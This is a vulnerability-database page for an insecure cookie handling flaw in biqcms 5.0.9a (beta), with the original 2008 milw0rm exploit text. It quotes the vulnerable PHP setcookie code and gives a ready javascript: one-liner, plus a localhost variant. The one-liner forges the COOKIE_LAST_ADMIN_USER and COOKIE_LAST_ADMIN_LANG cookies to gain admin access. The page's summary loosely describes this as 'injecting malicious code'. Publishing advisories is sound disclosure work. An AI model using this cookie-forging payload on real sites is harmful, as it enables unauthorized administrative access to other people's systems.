biqcms 5.0.9a (beta) Insecure Cookie Handling Vulnerability

vendor:

biqcms

by:

ZoRLu

7.5

CVSS

HIGH

Insecure Cookie Handling

264

CWE

Product Name: biqcms

Affected Version From: 5.0.9a (beta)

Affected Version To: 5.0.9a (beta)

Patch Exists: Yes

Related CWE: N/A

CPE: a:biqcms:biqcms:5.0.9a

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

biqcms 5.0.9a (beta) Insecure Cookie Handling Vulnerability

A vulnerability exists in biqcms 5.0.9a (beta) which allows an attacker to inject malicious code into the cookie. An attacker can exploit this vulnerability by setting the COOKIE_LAST_ADMIN_USER and COOKIE_LAST_ADMIN_LANG cookies to the real admin name and language, respectively. For example, an attacker can inject the following code into the cookie: javascript:document.cookie = "COOKIE_LAST_ADMIN_USER=real_admin_name; path=/"; document.cookie = "COOKIE_LAST_ADMIN_LANG=en-GB; path=/";

Mitigation:

The vendor has released a patch to address this vulnerability. Users should upgrade to the latest version of biqcms.

Source

Exploit-DB raw data:

biqcms 5.0.9a (beta) Insecure Cookie Handling Vulnerability
[~]
[~] donwload: http://sourceforge.net/project/showfiles.php?group_id=143555&package_id=232638&release_id=636935
[~]
[~] ----------------------------------------------------------
[~] Discovered By: ZoRLu
[~]
[~] Date: 30.10.2008
[~]
[~] Home: www.z0rlu.blogspot.com
[~]
[~] contact: trt-turk@hotmail.com
[~]
[~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( (
[~] 
[~] N0T: a.q kpss : ) )
[~]
[~] -----------------------------------------------------------

code:

        setcookie ("COOKIE_LAST_ADMIN_USER", $newAdmin["username"], time()+8640000, '/');
        setcookie ("COOKIE_LAST_ADMIN_LANG", $newAdmin["use_language_id"], time()+8640000, '/');


Exploit:

javascript:document.cookie = "COOKIE_LAST_ADMIN_USER=real_admin_name; path=/"; document.cookie = "COOKIE_LAST_ADMIN_LANG=en-GB; path=/";

example for my localhost:

javascript:document.cookie = "COOKIE_LAST_ADMIN_USER=zorlu; path=/"; document.cookie = "COOKIE_LAST_ADMIN_LANG=en-GB; path=/";

[~]----------------------------------------------------------------------
[~] Greetz tO: str0ke & all Muslim HaCkeRs
[~]
[~] yildirimordulari.org  &  r00tsecurity.org  &  darkc0de.com
[~]
[~]----------------------------------------------------------------------


# milw0rm.com [2008-10-31]